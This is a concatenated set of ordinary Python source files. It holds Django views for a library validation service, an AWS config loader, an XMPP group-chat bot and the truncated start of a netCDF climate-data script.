= validations.filter(\n last_verified__lte=now - settings.VALIDATION_PERIOD\n )\n if v.exists():\n random_slice = int(random.random() * v.count())\n v = v[random_slice:]\n reason += \'Item was randomly selected and within the \\\npast year because there is no prioritized record.\'\n # if that set has no objects, pick the oldest verified item.\n else:\n v = validations.order_by(\'last_verified\')\n reason += \'Item was chosen because there \\\nis no prioritized record and it had not been validated in the longest \\\nduration of time.\'\n self.reason = reason\n return v[:1]\n\n def item_title(self, item):\n return item.identifier\n\n def item_description(self, item):\n return self.reason\n\n def item_link(self, item):\n return \'/APP/validate/%s/\' % item.identifier\n\n\n# for some reason, I couldn\'t get AtomNextFeed to work without a server\n# I don\'t think optional arguments are supported for class-based syndication\n# feeds, so I have this work around to make it work.\nclass AtomNextFeedNoServer(AtomNextNewsFeed):\n def get_object(self, request):\n pass\n\n\ndef index(request):\n context = {\n \'recently_prioritized\': Validate.objects.filter(\n priority__gt=0).order_by(\'-priority_change_date\')[:20],\n \'recently_verified\': Validate.objects.all().order_by(\'-last_verified\')[:20],\n \'verified_counts\': Validate.objects.last_verified_status_counts()\n }\n\n return render(request, \'coda_validate/index.html\', context)\n\n\ndef last_day_of_month(year, month):\n """""" Work out the last day of the month """"""\n last_days = [31, 30, 29, 28, 27]\n for i in last_days:\n try:\n end = datetime.datetime(year, month, i)\n except ValueError:\n continue\n else:\n return end.day\n return None\n\n\ndef stats(request):\n """"""\n stats page\n """"""\n if not Validate.objects.exists():\n return render(\n request,\n \'coda_validate/stats.html\',\n {\n \'sums_by_date\': {},\n \'validations\': None,\n \'this_month\': None,\n \'last_24h\': None,\n \'last_vp\': None,\n \'unverified\': 0,\n \'passed\': 0,\n \'failed\': 0,\n \'validation_period\': \'%s days\' % str(\n settings.VALIDATION_PERIOD.days\n ),\n }\n )\n # resolve the range for last month filter\n today = datetime.date.today()\n first = datetime.date(day=1, month=today.month, year=today.year)\n last_day = last_day_of_month(first.year, first.month)\n this_month_range = [\n \'%s-%s-01 00:00:00\' % (first.year, first.month),\n \'%s-%s-%s 23:59:59\' % (first.year, first.month, last_day),\n ]\n # resolve the range for last 24 hours filter\n now = datetime.datetime.now()\n twenty_four_hours_ago = now - datetime.timedelta(hours=24)\n since_validation_period = now - datetime.timedelta(\n days=settings.VALIDATION_PERIOD.days)\n # make a set of data that makes sense for the heatmap\n result_counts = Validate.objects.last_verified_status_counts()\n total = sum(result_counts.values())\n sums_by_date = Validate.sums_by_date()\n sums_by_date_g = {}\n years = set()\n for dt, ct in sums_by_date.items():\n y, m, d = dt\n dt = (y, m - 1, d)\n sums_by_date_g[dt] = ct\n years.add(y)\n sums_by_date = sums_by_date_g\n num_years = len(years)\n return render(\n request,\n \'coda_validate/stats.html\',\n {\n \'sums_by_date\': dict(((\'%d, %d, %d\' % s, c)\n for s, c in sums_by_date.items())),\n \'num_years\': num_years,\n \'validations\': total,\n \'this_month\': Validate.objects.filter(\n last_verified__range=this_month_range).count(),\n \'last_24h\': Validate.objects.filter(\n last_verified__range=[twenty_four_hours_ago, now]).count(),\n \'last_vp\': Validate.objects.filter(\n last_verified__range=[since_validation_period, now]).count(),\n \'unverified\': result_counts.get(\'Unverified\'),\n \'passed\': result_counts.get(\'Passed\'),\n \'failed\': result_counts.get(\'Failed\'),\n \'validation_period\': \'%s days\' % str(settings.VALIDATION_PERIOD.days),\n }\n )\n\n\ndef prioritize(request):\n """"""\n prioritize view\n """"""\n\n identifier = request.GET.get(\'identifier\')\n prioritized = False\n if identifier:\n v = get_object_or_404(Validate, identifier=identifier)\n v.priority = 1\n v.priority_change_date = datetime.datetime.now()\n v.save()\n prioritized = True\n return render(\n request,\n \'coda_validate/prioritize.html\',\n {\n \'identifier\': identifier,\n \'prioritized\': prioritized,\n }\n )\n\n\ndef validate(request, identifier):\n """"""\n prioritize view\n """"""\n\n # this view always gets an identifier, if it\'s wrong, 404\n v = get_object_or_404(Validate, identifier=identifier)\n # clicked priority button on validate detail page\n p = request.GET.get(\'priority\')\n if p == \'1\':\n v.priority = 1\n v.priority_change_date = datetime.datetime.now()\n v.save()\n return render(\n request,\n \'coda_validate/validate.html\',\n {\n \'validate\': v,\n }\n )\n\n\ndef prioritize_json(request):\n """"""\n prioritize json view\n """"""\n\n DOMAIN = Site.objects.get_current().domain\n identifier = request.GET.get(\'identifier\')\n json_dict = {}\n json_dict[\'status\'] = \'failure\'\n status = 404\n if identifier:\n json_dict[\'requested_identifier\'] = identifier\n try:\n v = Validate.objects.get(identifier=identifier)\n except Exception:\n v = None\n if v:\n v.priority = 1\n v.priority_change_date = datetime.datetime.now()\n v.save()\n json_dict[\'status\'] = \'success\'\n json_dict[\'priority\'] = v.priority\n json_dict[\'priority_change_date\'] = str(v.priority_change_date)\n json_dict[\'atom_pub_url\'] = \'%s/APP/validate/%s\' % \\\n (DOMAIN, v.identifier)\n status = 200\n else:\n json_dict[\'response\'] = \'identifier was not found\'\n json_dict[\'requested_identifier\'] = identifier\n else:\n json_dict[\'response\'] = \'missing identifier parameter\'\n json_dict[\'requested_identifier\'] = \'\'\n status = 400\n response = HttpResponse(content_type=\'application/json\', status=status)\n json.dump(\n json_dict,\n fp=response,\n indent=4,\n sort_keys=True,\n )\n return response\n\n\ndef validateToXML(validateObject):\n """"""\n This is the reverse of xmlToValidateObject.\n Given a ""Validate"" object, it generates an\n XML object representative of such.\n """"""\n\n # define namespace\n validate_namespace = ""http://digital2.library.unt.edu/coda/validatexml/""\n val = ""{%s}"" % validate_namespace\n validate_nsmap = {""validate"": validate_namespace}\n\n # build xml from object and return\n XML = etree.Element(""{0}validate"".format(val), nsmap=validate_nsmap)\n\n label = etree.SubElement(XML, ""{0}identifier"".format(val))\n label.text = validateObject.identifier\n\n last_verified = etree.SubElement(XML, ""{0}last_verified"".format(val))\n last_verified.text = validateObject.last_verified.isoformat()\n\n last_verified_status = etree.SubElement(XML, ""{0}last_verified_status"".format(val))\n last_verified_status.text = validateObject.last_verified_status\n\n priority_change_date = etree.SubElement(XML, ""{0}priority_change_date"".format(val))\n priority_change_date.text = validateObject.priority_change_date.isoformat()\n\n priority = etree.SubElement(XML, ""{0}priority"".format(val))\n priority.text = str(validateObject.priority)\n\n server = etree.SubElement(XML, ""{0}server"".format(val))\n server.text = validateObject.server\n\n return XML\n\n\ndef xmlToValidateObject(validateXML):\n """"""\n Parse the XML in a POST request and create the validate object\n """"""\n\n entryRoot = etree.XML(validateXML)\n if entryRoot is None:\n raise ValueError(""Unable to parse uploaded XML"")\n # parse XML\n contentElement = entryRoot.xpath(""*[local-name() = \'content\']"")[0]\n validateXML = contentElement.xpath(""*[local-name() = \'validate\']"")[0]\n identifier = validateXML.xpath(\n ""*[local-name() = \'identifier\']"")[0].text.strip()\n\n last_verified = validateXML.xpath(\n ""*[local-name() = \'last_verified\']"")[0].text.strip()\n last_verified = parser.parse(last_verified)\n\n last_verified_status = validateXML.xpath(\n ""*[local-name() = \'last_verified_status\']"")[0].text.strip()\n\n priority_change_date = validateXML.xpath(\n ""*[local-name() = \'priority_change_date\']"")[0].text.strip()\n priority_change_date = parser.parse(priority_change_date)\n\n priority = validateXML.xpath(\n ""*[local-name() = \'priority\']"")[0].text.strip()\n\n server = validateXML.xpath(""*[local-name() = \'server\']"")[0].text.strip()\n\n # make the object and return\n validate = Validate(\n identifier=identifier,\n last_verified=last_verified,\n last_verified_status=last_verified_status,\n priority_change_date=priority_change_date,\n priority=priority,\n server=server,\n )\n return validate\n\n\ndef xmlToUpdateValidateObject(validateXML):\n """"""\n Parse the XML in a PUT request and adjust the validate based on that\n *ONLY MODIFIES \'last_verified_status\'*\n """"""\n\n entryRoot = etree.XML(validateXML)\n if entryRoot is None:\n raise ValueError(""Unable to parse uploaded XML"")\n # parse XML\n contentElement = entryRoot.xpath(""*[local-name() = \'content\']"")[0]\n validateXML = contentElement.xpath(""*[local-name() = \'validate\']"")[0]\n identifier = validateXML.xpath(\n ""*[local-name() = \'identifier\']"")[0].text.strip()\n last_verified_status = validateXML.xpath(\n ""*[local-name() = \'last_verified_status\']"")[0].text.strip()\n # get the object (or 404) and return to the APP view to finish up.\n validate = get_object_or_404(Validate, identifier=identifier)\n validate.last_verified_status = last_verified_status\n validate.last_verified = datetime.datetime.now()\n validate.priority = 0\n validate.save()\n return validate\n\n\ndef app_validate(request, identifier=None):\n """"""\n This method handles the ATOMpub protocol for validate objects\n """"""\n\n # are we POSTing a new identifier here?\n if request.method == \'POST\' and not identifier:\n # to object\n validateObject = xmlToValidateObject(request.body)\n validateObject.save()\n # and back to xml\n validateObjectXML = validateToXML(validateObject)\n atomXML = wrapAtom(\n xml=validateObjectXML,\n id=\'http://%s/APP/validate/%s/\' % (\n request.META[\'HTTP_HOST\'], validateObject.identifier\n ),\n title=validateObject.identifier,\n )\n atomText = XML_HEADER % etree.tostring(atomXML, pretty_print=True)\n resp = HttpResponse(atomText, content_type=""application/atom+xml"")\n resp.status_code = 201\n resp[\'Location\'] = \'http://%s/APP/validate/%s/\' % \\\n (request.META[\'HTTP_HOST\'], validateObject.identifier)\n elif request.method == \'HEAD\':\n resp = HttpResponse(content_type=""application/atom+xml"")\n resp.status_code = 200\n # if not, return a feed\n elif request.method == \'GET\' and not identifier:\n # negotiate the details of our feed here\n validates = Validate.objects.all()\n page = int(request.GET[\'page\']) if request.GET.get(\'page\') else 1\n atomFeed = makeObjectFeed(\n paginator=Paginator(validates, 20),\n objectToXMLFunction=validateToXML,\n feedId=request.path[1:],\n webRoot=\'http://%s\' % request.META.get(\'HTTP_HOST\'),\n title=""validate Entry Feed"",\n idAttr=""identifier"",\n nameAttr=""identifier"",\n dateAttr=""added"",\n request=request,\n page=page,\n author={\n ""name"": APP_AUTHOR.get(\'name\', None),\n ""uri"": APP_AUTHOR.get(\'uri\', None)\n },\n )\n atomFeedText = XML_HEADER % etree.tostring(atomFeed, pretty_print=True)\n resp = HttpResponse(atomFeedText, content_type=""application/atom+xml"")\n resp.status_code = 200\n # updating an existing record\n elif request.method == \'PUT\' and identifier:\n returnValidate = xmlToUpdateValidateObject(request.body)\n validateObjectXML = validateToXML(returnValidate)\n atomXML = wrapAtom(\n xml=validateObjectXML,\n id=\'http://%s/APP/validate/%s/\' % (\n request.META[\'HTTP_HOST\'], identifier\n ),\n title=identifier,\n )\n atomText = XML_HEADER % etree.tostring(atomXML, pretty_print=True)\n resp = HttpResponse(atomText, content_type=""application/atom+xml"")\n resp.status_code = 200\n elif request.method == \'GET\' and identifier:\n # attempt to retrieve record -- error if unable\n try:\n validate_object = Validate.objects.get(identifier=identifier)\n except Validate.DoesNotExist:\n return HttpResponseNotFound(\n ""There is no validate for identifier %s.\\n"" % identifier\n )\n returnValidate = validate_object\n validateObjectXML = validateToXML(returnValidate)\n atomXML = wrapAtom(\n xml=validateObjectXML,\n id=\'http://%s/APP/validate/%s/\' % (\n request.META[\'HTTP_HOST\'], identifier\n ),\n title=identifier,\n author=APP_AUTHOR.get(\'name\', None),\n author_uri=APP_AUTHOR.get(\'uri\', None)\n )\n atomText = XML_HEADER % etree.tostring(atomXML, pretty_print=True)\n resp = HttpResponse(atomText, content_type=""application/atom+xml"")\n resp.status_code = 200\n elif request.method == \'DELETE\' and identifier:\n # attempt to retrieve record -- error if unable\n try:\n validate_object = Validate.objects.get(identifier=identifier)\n except:\n return HttpResponseNotFound(\n ""Unable to Delete. There is no identifier %s.\\n"" % identifier)\n # grab the validate, delete it, and inform the user.\n returnValidate = validate_object\n validateObjectXML = validateToXML(returnValidate)\n validate_object.delete()\n atomXML = wrapAtom(\n xml=validateObjectXML,\n id=\'http://%s/APP/validate/%s/\' % (\n request.META[\'HTTP_HOST\'], identifier\n ),\n title=identifier,\n )\n atomText = XML_HEADER % etree.tostring(atomXML, pretty_print=True)\n resp = HttpResponse(atomText, content_type=""application/atom+xml"")\n resp.status_code = 200\n return resp\n\n\ndef check_json(request):\n counts = Validate.objects.last_verified_status_counts()\n return HttpResponse(json.dumps(counts), content_type=\'application/json\')\n\n\nclass ValidateListView(ListView):\n model = Validate\n template_name = \'coda_validate/list.html\'\n context_object_name = \'validation_list\'\n paginate_by = 20\n\n def get_queryset(self):\n queryset = super(ValidateListView, self).get_queryset()\n\n status = self.request.GET.get(\'status\')\n if status:\n queryset = queryset.filter(last_verified_status=status)\n\n return queryset\n', '#!/usr/bin/env python2\n# coding=utf-8\n""""""\nConfig Handler\n""""""\n\n__author__ = ""Manuel Ebert""\n__copyright__ = ""Copyright 2015, summer.ai""\n__date__ = ""2015-11-09""\n__email__ = dummy@email.com""\n\nimport boto3\nimport os\nfrom util import AttrDict\n\npath = os.path.dirname(os.path.abspath(__file__))\n\n\ndef load_yaml(filename):\n """"""\n This is a shitty YAML parser. If we were grown ups, we\'d use PyYaml of course.\n But since PyYaml refuses to run on AWS Lambda, we\'ll do this instead.\n\n Args:\n filename - filename to load\n Returns:\n dict\n """"""\n def parse_value(value):\n if ""#"" in value:\n value = value[:value.index(""#"")]\n value = value.strip("" \\n"")\n if not value:\n return None\n if value.lower() == ""true"":\n return True\n if value.lower() == ""false"":\n return False\n try:\n return int(value)\n except:\n try:\n return float(value)\n except:\n return value\n result = {}\n current_key = None\n with open(filename) as f:\n for line in f.readlines():\n if "":"" in line:\n key, value = line.split("":"", 1)\n key = key.strip()\n current_key = key\n result[key] = parse_value(value)\n elif line.strip().startswith(""-""):\n value = line.strip("" -\\n"")\n if not isinstance(result[current_key], list):\n result[current_key] = [parse_value(value)]\n else:\n result[current_key].append(parse_value(value))\n return result\n\n\ndef abs_path(filename):\n return os.path.join(path, ""config"", ""{}.yaml"".format(filename))\n\n\ndef load_config(config):\n keys = load_yaml(abs_path(""default""))\n\n keys[\'credentials\'] = {}\n if os.path.exists(abs_path(""credentials"")):\n keys[\'credentials\'] = load_yaml(abs_path(""credentials""))\n \n if config != \'default\':\n keys.update(load_yaml(abs_path(config)))\n\n if ""aws_access_key"" in keys[\'credentials\']:\n keys[\'s3\'] = boto3.resource(\n \'s3\', region_name=keys[\'region\'],\n aws_access_key_id=keys[\'credentials\'][\'aws_access_key\'],\n aws_secret_access_key=keys[\'credentials\'][\'aws_access_secret\']\n )\n keys[\'s3_client\'] = boto3.client(\n \'s3\', region_name=keys[\'region\'],\n aws_access_key_id=keys[\'credentials\'][\'aws_access_key\'],\n aws_secret_access_key=keys[\'credentials\'][\'aws_access_secret\']\n )\n else:\n keys[\'s3\'] = boto3.resource(\'s3\', region_name=keys[\'region\'])\n keys[\'s3_client\'] = boto3.client(\'s3\', region_name=keys[\'region\'])\n\n return AttrDict(keys)\n\n\nconfig = load_config(os.environ.get(\'WORDNIK_CONFIG\', \'default\'))\n\n\ndef update_config(config_name):\n global config\n config.__data.update(load_yaml(abs_path(config_name)))\n', '#!/usr/bin/env python3\n# vim:fileencoding=utf-8\n#\n# (C) Copyright 2012 lilydjwg dummy@email.com\n#\n# This file is part of xmpptalk.\n#\n# xmpptalk is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# xmpptalk is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with xmpptalk. If not, see .\n#\n\nimport sys\nimport os\nimport logging\nimport datetime\nimport base64\nimport hashlib\nfrom collections import defaultdict\nfrom functools import partial\nfrom xml.etree import ElementTree as ET\n\nimport pyxmpp2.exceptions\nfrom pyxmpp2.jid import JID\nfrom pyxmpp2.message import Message\nfrom pyxmpp2.presence import Presence\nfrom pyxmpp2.client import Client\nfrom pyxmpp2.settings import XMPPSettings\nfrom pyxmpp2.roster import RosterReceivedEvent\nfrom pyxmpp2.interfaces import EventHandler, event_handler, QUIT, NO_CHANGE\nfrom pyxmpp2.streamevents import AuthorizedEvent, DisconnectedEvent\nfrom pyxmpp2.interfaces import XMPPFeatureHandler\nfrom pyxmpp2.interfaces import presence_stanza_handler, message_stanza_handler\nfrom pyxmpp2.ext.version import VersionProvider\nfrom pyxmpp2.expdict import ExpiringDictionary\nfrom pyxmpp2.iq import Iq\n\ntry:\n from xmpp_receipt import ReceiptSender\nexcept ImportError:\n ReceiptSender = None\n\nfrom misc import *\nimport config\nimport models\nfrom models import ValidationError\nfrom messages import MessageMixin\nfrom user import UserMixin\n\nif getattr(config, \'conn_lost_interval_minutes\', False):\n conn_lost_interval = datetime.timedelta(minutes=config.conn_lost_interval_minutes)\nelse:\n conn_lost_interval = None\n\nclass ChatBot(MessageMixin, UserMixin, EventHandler, XMPPFeatureHandler):\n got_roster = False\n message_queue = None\n receipt_sender = None\n ignore = set()\n\n def __init__(self, jid, settings, botsettings=None):\n if \'software_name\' not in settings:\n settings[\'software_name\'] = self.__class__.__name__\n if \'software_version\' not in settings:\n settings[\'software_version\'] = __version__\n version_provider = VersionProvider(settings)\n\n handlers = []\n if ReceiptSender:\n self.receipt_sender = rs = ReceiptSender()\n handlers.append(rs)\n\n handlers.extend([self, version_provider])\n self.client = Client(jid, handlers, settings)\n\n self.presence = defaultdict(dict)\n self.subscribes = ExpiringDictionary(default_timeout=5)\n self.invited = {}\n self.avatar_hash = None\n self.settings = botsettings\n\n def run(self):\n self.client.connect()\n self.jid = self.client.jid.bare()\n logger.info(\'self jid: %r\', self.jid)\n self.update_on_setstatus = set()\n\n if self.receipt_sender:\n self.receipt_sender.stream = self.client.stream\n self.client.run()\n\n def disconnect(self):\n \'\'\'Request disconnection and let the main loop run for a 2 more\n seconds for graceful disconnection.\'\'\'\n self.client.disconnect()\n while True:\n try:\n self.client.run(timeout = 2)\n except pyxmpp2.exceptions.StreamParseError:\n # we raise SystemExit to exit, expat says XML_ERROR_FINISHED\n pass\n else:\n break\n\n def handle_early_message(self):\n self.got_roster = True\n q = self.message_queue\n if q:\n self.now = datetime.datetime.utcnow()\n for sender, stanza in q:\n self.current_jid = sender\n self._cached_jid = None\n try:\n timestamp = stanza.as_xml().find(\'{urn:xmpp:delay}delay\').attrib[\'stamp\']\n except AttributeError:\n timestamp = None\n self.handle_message(stanza.body, timestamp)\n self.message_queue = self.__class__.message_queue = None\n\n @event_handler(RosterReceivedEvent)\n def roster_received(self, stanze):\n self.delayed_call(2, self.handle_early_message)\n self.delayed_call(getattr(config, \'reconnect_timeout\', 24 * 3600), self.signal_connect)\n nick, avatar_type, avatar_file = (getattr(config, x, None) for x in (\'nick\', \'avatar_type\', \'avatar_file\'))\n if nick or (avatar_type and avatar_file):\n self.set_vcard(nick, (avatar_type, avatar_file))\n return True\n\n def signal_connect(self):\n logging.info(\'Schedule to re-connecting...\')\n self.client.disconnect()\n\n @message_stanza_handler()\n def message_received(self, stanza):\n if stanza.stanza_type != \'chat\':\n return True\n if not stanza.body:\n logging.info(""%s message: %s"", stanza.from_jid, stanza.serialize())\n return True\n\n sender = stanza.from_jid\n body = stanza.body\n self.current_jid = sender\n self.now = datetime.datetime.utcnow()\n\n logging.info(\'[%s] %s\', sender, stanza.body)\n if \'@\' not in str(sender.bare()):\n logging.info(\'(server messages ignored)\')\n return True\n\n if str(sender.bare()) in self.ignore:\n logging.info(\'(The above message is ignored on purpose)\')\n return True\n\n if getattr(config, \'ban_russian\'):\n if str(sender.bare()).endswith(\'.ru\'):\n logging.info(\'(Russian messager banned)\')\n return True\n elif is_russian(body):\n logging.info(\'(Russian message banned)\')\n return True\n\n if not self.got_roster:\n if not self.message_queue:\n self.message_queue = []\n self.message_queue.append((sender, stanza))\n else:\n self.handle_message(body)\n\n logging.info(\'done with new message\')\n return True\n\n def send_message(self, receiver, msg):\n if isinstance(receiver, str):\n receiver = JID(receiver)\n\n m = Message(\n stanza_type = \'chat\',\n from_jid = self.jid,\n to_jid = receiver,\n body = msg,\n )\n self.send(m)\n\n def reply(self, msg):\n self.send_message(self.current_jid, msg)\n\n def send(self, stanza):\n self.client.stream.send(stanza)\n\n def delayed_call(self, seconds, func, *args, **kwargs):\n self.client.main_loop.delayed_call(seconds, partial(func, *args, **kwargs))\n\n @event_handler(DisconnectedEvent)\n def handle_disconnected(self, event):\n return QUIT\n\n @property\n def roster(self):\n return self.client.roster\n\n def get_online_users(self):\n ret = [x.jid for x in self.roster if x.subscription == \'both\' and \\\n str(x.jid) in self.presence]\n logging.info(\'%d online buddies: %r\', len(ret), ret)\n return ret\n\n def get_xmpp_status(self, jid):\n return sorted(self.presence[str(jid)].values(), key=lambda x: x[\'priority\'], reverse=True)[0]\n\n def xmpp_setstatus(self, status, to_jid=None):\n if isinstance(to_jid, str):\n to_jid = JID(to_jid)\n\n presence = Presence(status=status, to_jid=to_jid)\n self.send(presence)\n\n def update_roster(self, jid, name=NO_CHANGE, groups=NO_CHANGE):\n self.client.roster_client.update_item(jid, name, groups)\n\n def removeInvitation(self):\n for ri in self.roster.values():\n if ri.ask is not None:\n self.client.roster_client.remove_item(ri.jid)\n logging.info(\'%s removed\', ri.jid)\n\n def unsubscribe(self, jid, type=\'unsubscribe\'):\n presence = Presence(to_jid=jid, stanza_type=type)\n self.send(presence)\n\n def subscribe(self, jid):\n self.invited[jid] = 2\n presence = Presence(to_jid=jid, stanza_type=\'subscribe\')\n self.send(presence)\n\n @presence_stanza_handler(\'subscribe\')\n def handle_presence_subscribe(self, stanza):\n logging.info(\'%s subscribe\', stanza.from_jid)\n sender = stanza.from_jid\n bare = sender.bare()\n\n # avoid repeated request\n invited = False\n if bare not in self.subscribes:\n invited = self.invited.get(bare, False)\n if invited is not False:\n if invited == 2:\n self.invited[bare] = 1\n else:\n del self.invited[bare]\n return stanza.make_accept_response()\n # We won\'t deny inivted members\n self.handle_userjoin_before()\n else:\n if config.private and str(bare) != config.root:\n self.send_message(sender, _(\'Sorry, this is a private group, and you are not invited.\'))\n return stanza.make_deny_response()\n if not self.handle_userjoin_before():\n return stanza.make_deny_response()\n\n self.current_jid = sender\n self.now = datetime.datetime.utcnow()\n try:\n self.handle_userjoin(action=stanza.stanza_type)\n except ValidationError:\n #The server is subscribing\n pass\n self.subscribes[bare] = True\n\n if stanza.stanza_type.endswith(\'ed\'):\n return stanza.make_accept_response()\n\n if invited is False:\n presence = Presence(to_jid=stanza.from_jid.bare(),\n stanza_type=\'subscribe\')\n return [stanza.make_accept_response(), presence]\n\n @presence_stanza_handler(\'subscribed\')\n def handle_presence_subscribed(self, stanza):\n # use the same function\n logging.info(\'%s subscribed\', stanza.from_jid)\n return self.handle_presence_subscribe(stanza)\n\n @presence_stanza_handler(\'unsubscribe\')\n def handle_presence_unsubscribe(self, stanza):\n logging.info(\'%s unsubscribe\', stanza.from_jid)\n sender = stanza.from_jid\n self.current_jid = sender\n self.now = datetime.datetime.utcnow()\n self.handle_userleave(action=stanza.stanza_type)\n\n if stanza.stanza_type.endswith(\'ed\'):\n return stanza.make_accept_response()\n\n presence = Presence(to_jid=stanza.from_jid.bare(),\n stanza_type=\'unsubscribe\')\n return [stanza.make_accept_response(), presence]\n\n @presence_stanza_handler(\'unsubscribed\')\n def handle_presence_unsubscribed(self, stanza):\n # use the same function\n logging.info(\'%s unsubscribed\', stanza.from_jid)\n return self.handle_presence_unsubscribe(stanza)\n\n @presence_stanza_handler()\n def handle_presence_available(self, stanza):\n if stanza.stanza_type not in (\'available\', None):\n return False\n\n jid = stanza.from_jid\n plainjid = str(jid.bare())\n if plainjid == str(self.jid):\n return\n\n self.now = datetime.datetime.utcnow()\n if plainjid not in self.presence:\n type = \'new\'\n self.current_jid = jid\n self.user_update_presence(plainjid)\n if conn_lost_interval and self.current_user and self.current_user.last_seen and \\\n self.now - self.current_user.last_seen < conn_lost_interval:\n type = \'reconnect\'\n self.send_lost_message()\n logging.info(\'%s[%s] (%s)\', jid, stanza.show or \'available\', type)\n\n if self.roster and jid.bare() not in self.roster:\n presence = Presence(to_jid=jid.bare(), stanza_type=\'subscribe\')\n self.send(presence)\n presence = Presence(to_jid=jid.bare(), stanza_type=\'subscribed\')\n self.send(presence)\n else:\n if jid.resource not in self.presence[plainjid]:\n self.user_update_presence(plainjid)\n logging.info(\'%s[%s]\', jid, stanza.show or \'available\')\n\n self.presence[plainjid][jid.resource] = {\n \'show\': stanza.show,\n \'status\': stanza.status,\n \'priority\': stanza.priority,\n }\n\n if self.get_user_by_jid(plainjid) is None:\n try:\n self.current_jid = jid\n self.handle_userjoin()\n except ValidationError:\n #The server is subscribing\n pass\n\n if config.warnv105 and jid.resource and \\\n jid.resource.startswith(\'Talk.\') and not jid.resource.startswith(\'Talk.v104\'):\n # Got a Talk.v107...\n # No need to translate; GTalk only has a v105 for Chinese.\n self.send_message(jid, \'警告:你正在使用的可能是不加密的 GTalk v105 版本。网络上的其它人可能会截获您的消息。这样不安全!请使用 GTalk v104 英文版或者其它 XMPP 客户端。\\nGTalk 英文版: http://www.google.com/talk/index.html\\nPidgin: http://www.pidgin.im/\')\n\n return True\n\n @presence_stanza_handler(\'unavailable\')\n def handle_presence_unavailable(self, stanza):\n jid = stanza.from_jid\n plainjid = str(jid.bare())\n if plainjid in self.presence and plainjid != str(self.jid):\n try:\n del self.presence[plainjid][jid.resource]\n except KeyError:\n pass\n if self.presence[plainjid]:\n logging.info(\'%s[unavailable] (partly)\', jid)\n else:\n del self.presence[plainjid]\n self.now = datetime.datetime.utcnow()\n self.user_disappeared(plainjid)\n logging.info(\'%s[unavailable] (totally)\', jid)\n return True\n\n @event_handler()\n def handle_all(self, event):\n \'\'\'Log all events.\'\'\'\n logging.info(\'-- {0}\'.format(event))\n\n def get_name(self, jid):\n if isinstance(jid, str):\n jid = JID(jid)\n else:\n jid = jid.bare()\n try:\n return self.roster[jid].name or hashjid(jid)\n except KeyError:\n return hashjid(jid)\n\n def get_vcard(self, jid=None, callback=None):\n \'\'\'callback is used as both result handler and error handler\'\'\'\n q = Iq(\n to_jid = jid and jid.bare(),\n stanza_type = \'get\',\n )\n vc = ET.Element(""{vcard-temp}vCard"")\n q.add_payload(vc)\n if callback:\n self.stanza_processor.set_response_handlers(q, callback, callback)\n self.send(q)\n\n def set_vcard(self, nick=None, avatar=None):\n self.get_vcard(callback=partial(self._set_vcard, nick, avatar))\n\n def _set_vcard(self, nick=None, avatar=None, stanza=None):\n #FIXME: This doesn\'t seem to work with jabber.org\n q = Iq(\n from_jid = self.jid,\n stanza_type = \'set\',\n )\n vc = ET.Element(""{vcard-temp}vCard"")\n if nick is not None:\n n = ET.SubElement(vc, \'{vcard-temp}FN\')\n n.text = nick\n if avatar is not None:\n type, picfile = avatar\n photo = ET.SubElement(vc, \'{vcard-temp}PHOTO\')\n t = ET.SubElement(photo, \'{vcard-temp}TYPE\')\n t.text = type\n d = ET.SubElement(photo, \'{vcard-temp}BINVAL\')\n data = open(picfile, \'rb\').read()\n d.text = base64.b64encode(data).decode(\'ascii\')\n self.avatar_hash = hashlib.new(\'sha1\', data).hexdigest()\n\n q.add_payload(vc)\n self.stanza_processor.set_response_handlers(\n q, self._set_vcard_callback, self._set_vcard_callback)\n self.send(q)\n\n def _set_vcard_callback(self, stanza):\n if stanza.stanza_type == \'error\':\n logging.error(\'failed to set my vCard.\')\n else:\n logging.info(\'my vCard set.\')\n self.update_presence()\n\n def update_presence(self):\n #TODO: update for individual users\n presence = self.settings[\'presence\']\n x = ET.Element(\'{vcard-temp:x:update}x\')\n if self.avatar_hash:\n photo = ET.SubElement(x, \'{vcard-temp:x:update}photo\')\n photo.text = self.avatar_hash\n presence.add_payload(x)\n self.send(presence)\n\ndef runit(settings, mysettings):\n bot = ChatBot(JID(config.jid), settings, mysettings)\n try:\n bot.run()\n # Connection resets\n raise Exception\n except SystemExit as e:\n if e.code == CMD_RESTART:\n # restart\n bot.disconnect()\n models.connection.disconnect()\n try:\n os.close(lock_fd[0])\n except:\n pass\n logging.info(\'restart...\')\n os.execv(sys.executable, [sys.executable] + sys.argv)\n except KeyboardInterrupt:\n pass\n finally:\n ChatBot.message_queue = bot.message_queue\n bot.disconnect()\n\ndef main():\n gp = models.connection.Group.one()\n if gp and gp.status:\n st = gp.status\n else:\n st = None\n settings = dict(\n # deliver here even if the admin logs in\n initial_presence = Presence(priority=30, status=st),\n poll_interval = 3,\n )\n botsettings = {\n \'presence\': settings[\'initial_presence\'],\n }\n settings.update(config.settings)\n settings = XMPPSettings(settings)\n\n if config.trace:\n logging.info(\'enabling trace\')\n for logger in (\'pyxmpp2.IN\', \'pyxmpp2.OUT\'):\n logger = logging.getLogger(logger)\n logger.setLevel(logging.DEBUG)\n\n for logger in (\n \'pyxmpp2.mainloop.base\', \'pyxmpp2.expdict\',\n \'pyxmpp2.mainloop.poll\', \'pyxmpp2.mainloop.events\',\n \'pyxmpp2.transport\', \'pyxmpp2.mainloop.events\',\n ):\n logger = logging.getLogger(logger)\n logger.setLevel(max((logging.INFO, config.logging_level)))\n\n if config.logging_level > logging.DEBUG:\n restart_if_failed(runit, 3, args=(settings, botsettings))\n else:\n runit(settings, botsettings)\n\nif __name__ == \'__main__\':\n setup_logging()\n models.init()\n main()\n', 'from datetime import datetime, timedelta\nfrom netCDF4 import Dataset\nfrom netCDF4 import num2date\nimport numpy as np\nimport time\nimport os\n\n__author__ = \'Trond Kristiansen\'\n__email__ = dummy@email.com\'\n__created__ = datetime(2014, 1, 23)\n__modified__ = datetime(2014, 1, 23)\n__version__ = ""0.1""\n__status__ = ""Development""\n\n\ndef help ():\n """"""\n This function generates a netCDF4 file and saves the runnings average values for\n specific years into file for each IPCC AR5 model.\n \n Used to gether with extractIce.py\n """"""\n\ndef writeCMIP5File(modelName,scenario,myvarname,lon,lat,time,mydata,mydataanomaly,outfilename):\n \n myformat=\'NETCDF3_CLASSIC\'\n \n if 